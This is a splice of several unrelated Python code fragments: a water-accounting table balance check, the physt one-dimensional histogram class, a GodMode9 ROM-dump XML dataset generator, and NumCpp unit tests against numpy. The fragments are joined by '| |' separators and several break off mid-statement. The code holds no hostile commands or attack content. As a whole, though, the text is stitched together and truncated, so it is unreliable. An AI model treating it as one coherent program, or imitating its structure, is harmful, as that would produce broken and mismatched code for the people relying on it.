and {1} row)'.format('UTILIZED', 'Shrubland'))
elif abs(c5r3_t2_left - c5r3_t2_right) > tolerance:
raise ValueError('The left and rigth sides \
do not add up ({0} table \
and {1} row)'.format('UTILIZED',
'Natural grasslands'))
elif abs(c5r4_t2_left - c5r4_t2_right) > tolerance:
raise ValueError('The left and rigth sides \
do not add up ({0} table \
and {1} row)'.format('UTILIZED',
'Natural water bodies'))
elif abs(c5r5_t2_left - c5r5_t2_right) > tolerance:
raise ValueError('The left and rigth sides \
do not add up ({0} table \
and {1} row)'.format('UTILIZED', 'Wetlands'))
elif abs(c5r6_t2_left - c5r6_t2_right) > tolerance:
raise ValueError('The left and rigth sides \
do not add up ({0} table \
and {1} row)'.format('UTILIZED', 'Others'))
# t3
elif abs(c5r1_t3_left - c5r1_t3_right) > tolerance:
raise ValueError('The left and rigth sides \
do not add up ({0} table \
and {1} row)'.format('MODIFIED', 'Rainfed crops'))
elif abs(c5r2_t3_left - c5r2_t3_right) > tolerance:
raise ValueError('The left and rigth sides \
do not add up ({0} table \
and {1} row)'.format('MODIFIED',
'Forest plantations'))
elif abs(c5r3_t3_left - c5r3_t3_right) > tolerance:
raise ValueError('The left and rigth sides \
do not add up ({0} table \
and {1} row)'.format('MODIFIED', 'Settlements'))
elif abs(c5r4_t3_left - c5r4_t3_right) > tolerance:
raise ValueError('The left and rigth sides \
do not add up ({0} table \
and {1} row)'.format('MODIFIED', 'Others'))
# t4
elif abs(c5r1_t4_left - c5r1_t4_right) > tolerance:
raise ValueError('The left and rigth sides \
do not add up ({0} table \
and {1} row)'.format('MANAGED CONVENTIONAL',
'Irrigated crops'))
elif abs(c5r2_t4_left - c5r2_t4_right) > tolerance:
raise ValueError('The left and rigth sides \
do not add up ({0} table \
and {1} row)'.format('MANAGED CONVENTIONAL',
'Managed water bodies'))
elif abs(c5r3_t4_left - c5r3_t4_right) > tolerance:
raise ValueError('The left and rigth sides \
do not add up ({0} table \
and {1} row)'.format('MANAGED CONVENTIONAL',
'Residential'))
elif abs(c5r4_t4_left - c5r4_t4_right) > tolerance:
raise ValueError('The left and rigth sides \
do not add up ({0} table \
and {1} row)'.format('MANAGED CONVENTIONAL',
'Industry'))
elif abs(c5r5_t4_left - c5r5_t4_right) > tolerance:
raise ValueError('The left and rigth sides \
do not add up ({0} table \
and {1} row)'.format('MANAGED CONVENTIONAL',
'Others'))
# t5
elif abs(c5r1_t5_left - c5r1_t5_right) > tolerance:
raise ValueError('The left and rigth sides \
do not add up ({0} table \
and {1} row)'.format('MANAGED NON_CONVENTIONAL',
'Indoor domestic'))
elif abs(c5r2_t5_left - c5r2_t5_right) > tolerance:
raise ValueError('The left and rigth sides \
do not add up ({0} table \
and {1} row)'.format('MANAGED NON_CONVENTIONAL',
'Indoor industrial'))
elif abs(c5r3_t5_left - c5r3_t5_right) > tolerance:
raise ValueError('The left and rigth sides \
do not add up ({0} table \
and {1} row)'.format('MANAGED NON_CONVENTIONAL',
'Greenhouses'))
elif abs(c5r4_t5_left - c5r4_t5_right) > tolerance:
raise ValueError('The left and rigth sides \
do not add up ({0} table \
and {1} row)'.format('MANAGED NON_CONVENTIONAL',
'Livestock and husbandry'))
elif abs(c5r5_t5_left - c5r5_t5_right) > tolerance:
raise ValueError('The left and rigth sides \
do not add up ({0} table \
and {1} row)'.format('MANAGED NON_CONVENTIONAL',
'Power and energy'))
elif abs(c5r6_t5_left - c5r6_t5_right) > tolerance:
raise ValueError('The left and rigth sides \
do not add up ({0} table \
| |
<gh_stars>0
"""One-dimensional histograms."""
from typing import Optional, Tuple
import numpy as np
from . import bin_utils
from .histogram_base import HistogramBase
from .binnings import BinningBase
# TODO: Fix I/O with binning
class Histogram1D(HistogramBase):
"""One-dimensional histogram data.
The bins can be of different widths.
The bins need not be consecutive. However, some functionality may not be available
for non-consecutive bins (like keeping information about underflow and overflow).
Attributes
----------
_stats : dict
These are the basic attributes that can be used in the constructor (see there)
Other attributes are dynamic.
"""
def __init__(self, binning, frequencies=None, errors2=None, *, stats=None, **kwargs):
"""Constructor
Parameters
----------
binning: physt.binnings.BinningBase or array_like
The binning
frequencies: Optional[array_like]
The bin contents.
keep_missed: Optional[bool]
Whether to keep track of underflow/overflow when filling with new values.
underflow: Optional[float]
Weight of observations that were smaller than the minimum bin.
overflow: Optional[float]
Weight of observations that were larger than the maximum bin.
name: Optional[str]
Name of the histogram (will be displayed as plot title)
axis_name: Optional[str]
Name of the characteristics that is histogrammed (will be displayed on x axis)
errors2: Optional[array_like]
Quadratic errors of individual bins. If not set, defaults to frequencies.
stats: dict
Dictionary of various statistics ("sum", "sum2")
"""
missed = [
kwargs.pop("underflow", 0),
kwargs.pop("overflow", 0),
kwargs.pop("inner_missed", 0)
]
if "axis_name" in kwargs:
kwargs["axis_names"] = [kwargs.pop("axis_name")]
HistogramBase.__init__(self, [binning], frequencies, errors2, **kwargs)
if frequencies is None:
self._stats = Histogram1D.EMPTY_STATS.copy()
else:
self._stats = stats
if self.keep_missed:
self._missed = np.array(missed, dtype=self.dtype)
else:
self._missed = np.zeros(3, dtype=self.dtype)
EMPTY_STATS = {"sum": 0.0, "sum2": 0.0}
@property
def axis_name(self) -> str:
return self.axis_names[0]
@axis_name.setter
def axis_name(self, value: str):
self.axis_names = (value,)
def select(self, axis, index, force_copy: bool = False):
"""Alias for [] to be compatible with HistogramND."""
if axis == 0:
if index == slice(None) and not force_copy:
return self
return self[index]
else:
raise ValueError("In Histogram1D.select(), axis must be 0.")
def __getitem__(self, i):
"""Select sub-histogram or get one bin.
Parameters
----------
i : int or slice or bool masked array or array with indices
In most cases, this has same semantics as for numpy.ndarray.__getitem__
Returns
-------
Histogram1D or tuple
Depending on the parameters, a sub-histogram or content of one bin are returned.
"""
underflow = np.nan
overflow = np.nan
keep_missed = False
if isinstance(i, int):
return self.bins[i], self.frequencies[i]
elif isinstance(i, np.ndarray):
if i.dtype == bool:
if i.shape != (self.bin_count,):
raise IndexError("Cannot index with masked array of a wrong dimension")
elif isinstance(i, slice):
keep_missed = self.keep_missed
# TODO: Fix this
if i.step:
raise IndexError("Cannot change the order of bins")
if i.step == 1 or i.step is None:
underflow = self.underflow
overflow = self.overflow
if i.start:
underflow += self.frequencies[0:i.start].sum()
if i.stop:
overflow += self.frequencies[i.stop:].sum()
# Masked arrays or item list or ...
return self.__class__(self._binning.as_static(copy=False)[i], self.frequencies[i],
self.errors2[i], overflow=overflow, keep_missed=keep_missed,
underflow=underflow, dtype=self.dtype,
name=self.name, axis_name=self.axis_name)
@property
def _binning(self) -> BinningBase:
"""Adapter property for HistogramBase interface"""
return self._binnings[0]
@_binning.setter
def _binning(self, value: BinningBase):
self._binnings = [value]
@property
def binning(self) -> BinningBase:
"""The binning.
Note: Please, do not try to update the object itself.
"""
return self._binning
@property
def bins(self) -> np.ndarray:
"""Array of all bin edges.
Returns
-------
Wide-format [[leftedge1, rightedge1], ... [leftedgeN, rightedgeN]]
"""
# TODO: Read-only copy
return self._binning.bins # TODO: or this should be read-only copy?
@property
def numpy_bins(self) -> np.ndarray:
"""Bins in the format of numpy.
"""
# TODO: If not consecutive, does not make sense
# TODO: Deprecate
return self._binning.numpy_bins
@property
def edges(self) -> np.ndarray:
return self.numpy_bins
@property
def numpy_like(self) -> Tuple[np.ndarray, np.ndarray]:
"""Same result as would the numpy.histogram function return."""
return self.frequencies, self.numpy_bins
@property
def cumulative_frequencies(self) -> np.ndarray:
"""Cumulative frequencies.
Note: underflow values are not considered
"""
return self._frequencies.cumsum()
@property
def underflow(self):
if not self.keep_missed:
return np.nan
return self._missed[0]
@underflow.setter
def underflow(self, value):
self._missed[0] = value
@property
def overflow(self):
if not self.keep_missed:
return np.nan
return self._missed[1]
@overflow.setter
def overflow(self, value):
self._missed[1] = value
@property
def inner_missed(self):
if not self.keep_missed:
return np.nan
return self._missed[2]
@inner_missed.setter
def inner_missed(self, value):
self._missed[2] = value
def mean(self) -> Optional[float]:
"""Statistical mean of all values entered into histogram.
This number is precise, because we keep the necessary data
separate from bin contents.
"""
if self._stats: # TODO: should be true always?
if self.total > 0:
return self._stats["sum"] / self.total
else:
return np.nan
else:
return None # TODO: or error
def std(self) -> Optional[float]: #, ddof=0):
"""Standard deviation of all values entered into histogram.
This number is precise, because we keep the necessary data
separate from bin contents.
Returns
-------
float
"""
# TODO: Add DOF
if self._stats:
return np.sqrt(self.variance())
else:
return None # TODO: or error
def variance(self) -> Optional[float]: #, ddof: int = 0) -> float:
"""Statistical variance of all values entered into histogram.
This number is precise, because we keep the necessary data
separate from bin contents.
Returns
-------
float
"""
# TODO: Add DOF
# http://stats.stackexchange.com/questions/6534/how-do-i-calculate-a-weighted-standard-deviation-in-excel
if self._stats:
if self.total > 0:
return (self._stats["sum2"] - self._stats["sum"] ** 2 / self.total) / self.total
else:
return np.nan
else:
return None
# TODO: Add (correct) implementation of SEM
# def sem(self):
# if self._stats:
# return 1 / total * np.sqrt(self.variance)
# else:
# return None
@property
def bin_left_edges(self):
"""Left edges of all bins.
Returns
-------
numpy.ndarray
"""
return self.bins[..., 0]
@property
def bin_right_edges(self):
"""Right edges of all bins.
Returns
-------
numpy.ndarray
"""
return self.bins[..., 1]
@property
def min_edge(self):
"""Left edge of the first bin.
Returns
-------
float
"""
return self.bin_left_edges[0]
@property
def max_edge(self):
"""Right edge of the last bin.
Returns
-------
float
"""
# TODO: Perh
return self.bin_right_edges[-1]
@property
def bin_centers(self):
"""Centers of all bins.
Returns
-------
numpy.ndarray
"""
return (self.bin_left_edges + self.bin_right_edges) / 2
@property
def bin_widths(self):
"""Widths of all bins.
Returns
-------
numpy.ndarray
"""
return self.bin_right_edges - self.bin_left_edges
@property
def total_width(self):
"""Total width of all bins.
In inconsecutive histograms, the missing intervals are not counted in.
Returns
-------
float
"""
return self.bin_widths.sum()
@property
def bin_sizes(self):
return self.bin_widths
def find_bin(self, value):
"""Index of bin corresponding to a value.
Parameters
----------
value: float
Value to be searched for.
Returns
-------
int
index of bin to which value belongs
(-1=underflow, N=overflow, None=not found - inconsecutive)
"""
ixbin = np.searchsorted(self.bin_left_edges, value, side="right")
if ixbin == 0:
return -1
elif ixbin == self.bin_count:
if value <= self.bin_right_edges[-1]:
return ixbin - 1
else:
return self.bin_count
elif value < self.bin_right_edges[ixbin - 1]:
return ixbin - 1
elif ixbin == self.bin_count:
return self.bin_count
else:
return None
def fill(self, value, weight=1):
"""Update histogram with a new value.
Parameters
----------
value: float
Value to be added.
weight: float, optional
Weight assigned to the value.
Returns
-------
int
index of bin which was incremented (-1=underflow, N=overflow, None=not found)
Note: If a gap in unconsecutive bins is matched, underflow & overflow are not valid anymore.
Note: Name was selected because of the eponymous method in ROOT
"""
self._coerce_dtype(type(weight))
if self._binning.is_adaptive():
map = self._binning.force_bin_existence(value)
self._reshape_data(self._binning.bin_count, map)
ixbin = self.find_bin(value)
if ixbin is None:
self.overflow = np.nan
self.underflow = np.nan
elif ixbin == -1 and self.keep_missed:
self.underflow += weight
elif ixbin == self.bin_count and self.keep_missed:
self.overflow += weight
else:
self._frequencies[ixbin] += weight
self._errors2[ixbin] += weight ** 2
if self._stats:
self._stats["sum"] += weight * value
self._stats["sum2"] += weight * value ** 2
return ixbin
def fill_n(self, values, weights=None, dropna: bool = True):
"""Update histograms with a set of values.
Parameters
----------
values: array_like
weights: Optional[array_like]
drop_na: Optional[bool]
If true (default), all nan's are skipped.
"""
# TODO: Unify with HistogramBase
values = np.asarray(values)
if dropna:
values = values[~np.isnan(values)]
if self._binning.is_adaptive():
map = self._binning.force_bin_existence(values)
self._reshape_data(self._binning.bin_count, map)
if weights:
weights = np.asarray(weights)
self._coerce_dtype(weights.dtype)
(frequencies, errors2, underflow, overflow, stats) = \
calculate_frequencies(values, self._binning, dtype=self.dtype,
weights=weights, validate_bins=False)
self._frequencies += frequencies
self._errors2 += errors2
# TODO: check that adaptive does not produce under-/over-flows?
if self.keep_missed:
self.underflow += underflow
self.overflow += overflow
if self._stats:
for key in self._stats:
self._stats[key] += stats.get(key, 0.0)
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
# TODO: Change to something in binning itself
if not | |
#!/usr/bin/env python3
"""
* xml_dataset_generator_gm9.py
*
* Copyright (c) 2022, DarkMatterCore <<EMAIL>>.
*
* Permission to use, copy, modify, and/or distribute this software for any
* purpose with or without fee is hereby granted, provided that the above
* copyright notice and this permission notice appear in all copies.
*
* THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
* WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
* MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
* ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
* WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
* ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
* OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
from __future__ import print_function
import os
import sys
import re
import base64
import subprocess
import traceback
from datetime import datetime
from argparse import ArgumentParser
from typing import List, Union, Tuple, Dict, Pattern, TYPE_CHECKING
SCRIPT_NAME: str = os.path.basename(sys.argv[0])
INITIAL_DIR: str = os.path.abspath(os.path.dirname(__file__))
HASHES_PATH: str = os.path.join('.', 'hashes')
OUTPUT_PATH: str = os.path.join('.', 'out')
PROPERTIES_COUNT: int = 6
XML_HEADER: str = '<?xml version="1.0" encoding="utf-8"?>\n'
XML_HEADER += '<!DOCTYPE datafile PUBLIC "http://www.logiqx.com/Dats/datafile.dtd" "-//Logiqx//DTD ROM Management Datafile//EN">\n'
XML_HEADER += '<datafile>\n'
XML_HEADER += ' <header>\n'
XML_HEADER += ' </header>\n'
XML_FOOTER: str = '</datafile>\n'
HTML_LINE_BREAK: str = '
'
DEFAULT_COMMENT2: str = ''
GIT_BRANCH: str = ''
GIT_COMMIT: str = ''
GIT_REV: str = ''
GM9_PRODUCT_CODE_REGEX: Pattern[str] = re.compile(r"Product\s+Code\s*:\s*(.+)", flags=re.IGNORECASE)
GM9_CART_ID_REGEX: Pattern[str] = re.compile(r"Cart\s+ID\s*:\s*(.+)", flags=re.IGNORECASE)
GM9_PLATFORM_REGEX: Pattern[str] = re.compile(r"Platform\s*:\s*(.+)", flags=re.IGNORECASE)
GM9_SAVE_CHIP_ID_REGEX: Pattern[str] = re.compile(r"Save\s+chip\s+ID\s*:\s*(?:0x)?(.+)", flags=re.IGNORECASE)
GM9_TIMESTAMP_REGEX: Pattern[str] = re.compile(r"Timestamp\s*:\s*(\d{4}-\d{2}-\d{2}\s+\d{2}:\d{2}:\d{2})", flags=re.IGNORECASE)
GM9_VERSION_REGEX: Pattern[str] = re.compile(r"GM9\s+Version\s*:\s*(.+)", flags=re.IGNORECASE)
WHITESPACE_REGEX: Pattern[str] = re.compile(r"\s+")
ROM_PROPERTIES: Dict = {
'ds': [ 'nds', 'Decrypted' ],
'dsi enhanced': [ 'nds', 'Decrypted' ],
'dsi exclusive': [ 'dsi', 'Decrypted' ],
'o3ds': [ '3ds', 'Encrypted' ],
'n3ds': [ '3ds', 'Encrypted' ]
}
DEFAULT_EARLIEST_DATE: datetime = datetime.strptime('2021-03-22', '%Y-%m-%d')
MEDIA_PICTURE_TYPES: List = [
'back',
'front'
]
MEDIA_PICTURE_EXTENSIONS: List = [
'png',
'jpg',
'jpeg',
'bmp'
]
HASH_FILE_NAME: str = 'HASHES.txt'
HASH_ENTRY_FILE_NAME_REGEX: Pattern[str] = re.compile(r"^File:\s*(.+)", flags=(re.MULTILINE | re.IGNORECASE))
HASH_ENTRY_FILE_SIZE_REGEX: Pattern[str] = re.compile(r"^Size\s*\(Bytes\):\s*(\d+)", flags=(re.MULTILINE | re.IGNORECASE))
HASH_ENTRY_CRC32_REGEX: Pattern[str] = re.compile(r"^CRC32:\s*([\da-f]{8})", flags=(re.MULTILINE | re.IGNORECASE))
HASH_ENTRY_MD5_REGEX: Pattern[str] = re.compile(r"^MD5:\s*([\da-f]{32})", flags=(re.MULTILINE | re.IGNORECASE))
HASH_ENTRY_SHA1_REGEX: Pattern[str] = re.compile(r"^SHA1:\s*([\da-f]{40})", flags=(re.MULTILINE | re.IGNORECASE))
HASH_ENTRY_SHA256_REGEX: Pattern[str] = re.compile(r"^SHA256:\s*([\da-f]{64})", flags=(re.MULTILINE | re.IGNORECASE))
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
def utilsGetPath(path_arg: str, fallback_path: str, is_file: bool, create: bool = False) -> str:
path = os.path.abspath(os.path.expanduser(os.path.expandvars(path_arg if path_arg else fallback_path)))
if not is_file and create: os.makedirs(path, exist_ok=True)
if not os.path.exists(path) or (is_file and os.path.isdir(path)) or (not is_file and os.path.isfile(path)):
raise Exception("Error: '%s' points to an invalid file/directory." % (path))
return path
def utilsRunGit(args: List[str]) -> subprocess.CompletedProcess:
return subprocess.run(['git'] + args, capture_output=True, encoding='utf-8')
def utilsGetGitInfo() -> None:
global DEFAULT_COMMENT2, GIT_BRANCH, GIT_COMMIT, GIT_REV
# Get git branch.
proc = utilsRunGit(['rev-parse', '--abbrev-ref', 'HEAD'])
if not proc.stdout or proc.returncode != 0: raise Exception('Failed to run git!')
GIT_BRANCH = proc.stdout.strip()
# Get git commit.
proc = utilsRunGit(['rev-parse', '--short', 'HEAD'])
if not proc.stdout or proc.returncode != 0: raise Exception('Failed to run git!')
GIT_COMMIT = proc.stdout.strip()
# Generate git revision string.
GIT_REV = GIT_BRANCH + '-' + GIT_COMMIT
proc = utilsRunGit(['status', '--porcelain'])
if proc.returncode != 0: raise Exception('Failed to run git!')
proc = proc.stdout.strip()
if proc: GIT_REV += '-dirty'
# Update default comment2 string.
comment2_str = DEFAULT_COMMENT2
DEFAULT_COMMENT2 = '[%s revision %s used to generate XML files]' % (SCRIPT_NAME, GIT_REV)
if comment2_str: DEFAULT_COMMENT2 += '%s%s' % (HTML_LINE_BREAK, comment2_str)
def utilsGetRegexResult(cur_value: str, regex: Pattern[str], search_str: str) -> str:
if not cur_value:
cur_value = re.search(regex, search_str)
if cur_value: cur_value = cur_value.group(1).strip()
return cur_value
def utilsGetBase64EncodedMediaPictures(indir: str, basename: str) -> Dict:
# Empty dictionary to hold the Base64-encoded media pictures.
media_pictures = {}
# Loop through all possible media picture combinations.
for media_picture_type in MEDIA_PICTURE_TYPES:
for media_picture_ext in MEDIA_PICTURE_EXTENSIONS:
# Generate path. Skip entry if the file doesn't exist or if it's empty.
media_path = os.path.join(indir, basename + '_' + media_picture_type + '.' + media_picture_ext)
if (not os.path.exists(media_path)) or os.path.isdir(media_path) or (not os.path.getsize(media_path)): continue
# Read whole file into memory.
with open(media_path, 'rb') as media_fd: media_data = media_fd.read()
# Convert media picture data into a Base64-encoded string.
media_data = base64.b64encode(media_data).decode('utf-8')
# Update dictionary.
media_pictures.update({ media_picture_type: media_data })
break
return media_pictures
def utilsBuildGM9Cache(indir: str) -> Dict:
# Empty dictionary, used to hold the GodMode9 cache.
gm9_cache = {}
# Get current date.
now = datetime.utcnow()
# Scan GodMode9 dump directory.
dir_scan = os.scandir(indir)
# Parse available TXT files.
for entry in dir_scan:
# Skip files without a TXT extension.
if (not entry.is_file()) or (not entry.name.lower().endswith('.txt')) or (entry.name.lower() == 'hashes.txt'): continue
# Initialize variables.
filename: str = os.path.splitext(entry.name)[0]
product_code: str = ''
cart_id: str = ''
platform: str = ''
save_chip_id: str = ''
timestamp: str = ''
gm9_version: str = ''
extension: str = ''
crypto: str = ''
# Parse TXT file.
with open(entry.path, 'r') as txt:
for idx, line in enumerate(txt):
# Strip current line.
cur_line = line.strip()
# Look for relevant data.
product_code = utilsGetRegexResult(product_code, GM9_PRODUCT_CODE_REGEX, cur_line)
cart_id = utilsGetRegexResult(cart_id, GM9_CART_ID_REGEX, cur_line)
platform = utilsGetRegexResult(platform, GM9_PLATFORM_REGEX, cur_line)
save_chip_id = utilsGetRegexResult(save_chip_id, GM9_SAVE_CHIP_ID_REGEX, cur_line)
timestamp = utilsGetRegexResult(timestamp, GM9_TIMESTAMP_REGEX, cur_line)
gm9_version = utilsGetRegexResult(gm9_version, GM9_VERSION_REGEX, cur_line)
# Skip this entry if we're missing critical data.
if (not product_code) or (not cart_id) or (not platform) or (not timestamp) or (not gm9_version): continue
# Sanitize data.
platform = platform.lower()
timestamp = WHITESPACE_REGEX.sub(' ', timestamp).strip().split(' ')[0]
# Get ROM properties. Skip entry if we're dealing with an invalid platform.
properties = ROM_PROPERTIES.get(platform, [])
if not properties: continue
(extension, crypto) = properties
# Get the last modified date from this file.
file_mtime = datetime.utcfromtimestamp(os.path.getmtime(entry.path)).replace(hour=0, minute=0, second=0)
gm9_mtime = datetime.strptime(timestamp, '%Y-%m-%d')
# Compare dates. Emit a warning if there's a mismatch.
if file_mtime != gm9_mtime:
eprint('WARNING: last modification date from \'%s\' doesn\'t match GodMode9\'s timestamp! (%s != %s).\n' % (entry.name, file_mtime.strftime('%Y-%m-%d'), gm9_mtime.strftime('%Y-%m-%d')))
elif file_mtime < DEFAULT_EARLIEST_DATE:
eprint('WARNING: dump date from \'%s\' is too old! (%s < %s).\n' % (entry.name, file_mtime.strftime('%Y-%m-%d'), DEFAULT_EARLIEST_DATE.strftime('%Y-%m-%d')))
elif file_mtime > now:
eprint('WARNING: dump date from \'%s\' exceeds current UTC timestamp! (%s > %s).\n' % (entry.name, file_mtime.strftime('%Y-%m-%d'), now.strftime('%Y-%m-%d')))
# Check if there's any media pictures available.
media_pictures = utilsGetBase64EncodedMediaPictures(indir, filename)
# Update GodMode9 dictionary.
platform_dict = gm9_cache.get(extension, {})
file_dict = platform_dict.get(filename, {})
file_dict.update({
'product_code': product_code,
'cart_id': cart_id,
'timestamp': timestamp,
'gm9_version': gm9_version,
'crypto': crypto
})
# Only store the Save Chip ID if we actually got it.
if save_chip_id: file_dict.update({ 'save_chip_id': save_chip_id })
# Merge file and media pictures dictionaries if we have picture data.
if media_pictures: file_dict = file_dict | media_pictures
platform_dict.update({ filename: file_dict })
gm9_cache.update({ extension: platform_dict })
return gm9_cache
def utilsGetChecksumData(indir: str, gm9_cache: Dict) -> Dict:
hash_entries: List = []
cur_hash_entry: str = ''
save_flag: bool = False
# Generate hash file path.
hash_file_path = os.path.join(indir, HASH_FILE_NAME)
if (not os.path.exists(hash_file_path)) or os.path.isdir(hash_file_path) or (not os.path.getsize(hash_file_path)): raise Exception('File \'%s\' unavailable or empty!' % (hash_file_path))
# Get hash entries from the hash file.
with open(hash_file_path, mode='r', encoding='utf-16') as hash_file:
for idx, line in enumerate(hash_file):
cur_line = line.strip()
if (not save_flag) and (cur_line == '----| File Data |--------------------------------------------------'):
save_flag = True
elif save_flag and ((cur_line == '-------------------------------------------------------------------') or (cur_line[0:5] == '----|')):
hash_entries.append(cur_hash_entry)
cur_hash_entry = ''
save_flag = False
elif save_flag:
cur_hash_entry += line
if not hash_entries: raise Exception('No valid File Data entries found in \'%s\'!' % (hash_file_path))
# Process hash entries.
for cur_hash_entry in hash_entries:
# Initialize variables.
filename: str = ''
size: str = ''
crc32: str = ''
md5: str = ''
sha1: str = ''
sha256: str = ''
# Look for relevant data.
filename = utilsGetRegexResult(filename, HASH_ENTRY_FILE_NAME_REGEX, cur_hash_entry)
size = utilsGetRegexResult(size, HASH_ENTRY_FILE_SIZE_REGEX, cur_hash_entry)
crc32 = utilsGetRegexResult(crc32, HASH_ENTRY_CRC32_REGEX, cur_hash_entry)
md5 = utilsGetRegexResult(md5, HASH_ENTRY_MD5_REGEX, cur_hash_entry)
sha1 = utilsGetRegexResult(sha1, HASH_ENTRY_SHA1_REGEX, cur_hash_entry)
sha256 = utilsGetRegexResult(sha256, HASH_ENTRY_SHA256_REGEX, cur_hash_entry)
# Skip entry if we couldn't find any relevant data.
if (not filename) or (not size) or ((not crc32) and (not md5) and (not sha1) and (not sha256)): continue
# Get basename and extension.
(basename, extension) = os.path.splitext(filename)
extension = extension[1:].lower()
# Get dictionary for this file.
platform_dict = gm9_cache.get(extension, {})
if not platform_dict:
eprint('WARNING: unrecognized file extension for \'%s\'! Skipping...\n' % (filename))
continue
file_dict = platform_dict.get(basename, {})
if not file_dict:
eprint('WARNING: GodMode9 data | |
100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArray(shape)
data = np.random.randint(0, 100, [shape.rows, shape.cols])
cArray.setArray(data)
assert np.array_equal(NumCpp.amin(cArray, NumCpp.Axis.COL).flatten(), np.min(data, axis=1))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArrayComplexDouble(shape)
real = np.random.randint(1, 100, [shape.rows, shape.cols])
imag = np.random.randint(1, 100, [shape.rows, shape.cols])
data = real + 1j * imag
cArray.setArray(data)
assert np.array_equal(NumCpp.amin(cArray, NumCpp.Axis.COL).flatten(), np.min(data, axis=1))
####################################################################################
def test_angle():
components = np.random.randint(-100, -1, [2, ]).astype(np.double)
value = complex(components[0], components[1])
assert np.round(NumCpp.angleScaler(value), 9) == np.round(np.angle(value), 9) # noqa
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArrayComplexDouble(shape)
data = np.random.randint(-100, 100, [shape.rows, shape.cols]) + \
1j * np.random.randint(-100, 100, [shape.rows, shape.cols])
cArray.setArray(data)
assert np.array_equal(np.round(NumCpp.angleArray(cArray), 9), np.round(np.angle(data), 9))
####################################################################################
def test_any():
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArray(shape)
data = np.random.randint(0, 100, [shape.rows, shape.cols])
cArray.setArray(data)
assert NumCpp.any(cArray, NumCpp.Axis.NONE).astype(bool).item() == np.any(data).item()
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArrayComplexDouble(shape)
real = np.random.randint(1, 100, [shape.rows, shape.cols])
imag = np.random.randint(1, 100, [shape.rows, shape.cols])
data = real + 1j * imag
cArray.setArray(data)
assert NumCpp.any(cArray, NumCpp.Axis.NONE).astype(bool).item() == np.any(data).item()
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArray(shape)
data = np.random.randint(0, 100, [shape.rows, shape.cols])
cArray.setArray(data)
assert np.array_equal(NumCpp.any(cArray, NumCpp.Axis.ROW).flatten().astype(bool), np.any(data, axis=0))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArrayComplexDouble(shape)
real = np.random.randint(1, 100, [shape.rows, shape.cols])
imag = np.random.randint(1, 100, [shape.rows, shape.cols])
data = real + 1j * imag
cArray.setArray(data)
assert np.array_equal(NumCpp.any(cArray, NumCpp.Axis.ROW).flatten().astype(bool), np.any(data, axis=0))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArray(shape)
data = np.random.randint(0, 100, [shape.rows, shape.cols])
cArray.setArray(data)
assert np.array_equal(NumCpp.any(cArray, NumCpp.Axis.COL).flatten().astype(bool), np.any(data, axis=1))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArrayComplexDouble(shape)
real = np.random.randint(1, 100, [shape.rows, shape.cols])
imag = np.random.randint(1, 100, [shape.rows, shape.cols])
data = real + 1j * imag
cArray.setArray(data)
assert np.array_equal(NumCpp.any(cArray, NumCpp.Axis.COL).flatten().astype(bool), np.any(data, axis=1))
####################################################################################
def test_append():
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray1 = NumCpp.NdArray(shape)
cArray2 = NumCpp.NdArray(shape)
data1 = np.random.randint(0, 100, [shape.rows, shape.cols])
data2 = np.random.randint(0, 100, [shape.rows, shape.cols])
cArray1.setArray(data1)
cArray2.setArray(data2)
assert np.array_equal(NumCpp.append(cArray1, cArray2, NumCpp.Axis.NONE).getNumpyArray().flatten(),
np.append(data1, data2))
shapeInput = np.random.randint(20, 100, [2, ])
numRows = np.random.randint(1, 100, [1, ]).item()
shape1 = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
shape2 = NumCpp.Shape(shapeInput[0].item() + numRows, shapeInput[1].item())
cArray1 = NumCpp.NdArray(shape1)
cArray2 = NumCpp.NdArray(shape2)
data1 = np.random.randint(0, 100, [shape1.rows, shape1.cols])
data2 = np.random.randint(0, 100, [shape2.rows, shape2.cols])
cArray1.setArray(data1)
cArray2.setArray(data2)
assert np.array_equal(NumCpp.append(cArray1, cArray2, NumCpp.Axis.ROW).getNumpyArray(),
np.append(data1, data2, axis=0))
shapeInput = np.random.randint(20, 100, [2, ])
NumCppols = np.random.randint(1, 100, [1, ]).item()
shape1 = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
shape2 = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item() + NumCppols)
cArray1 = NumCpp.NdArray(shape1)
cArray2 = NumCpp.NdArray(shape2)
data1 = np.random.randint(0, 100, [shape1.rows, shape1.cols])
data2 = np.random.randint(0, 100, [shape2.rows, shape2.cols])
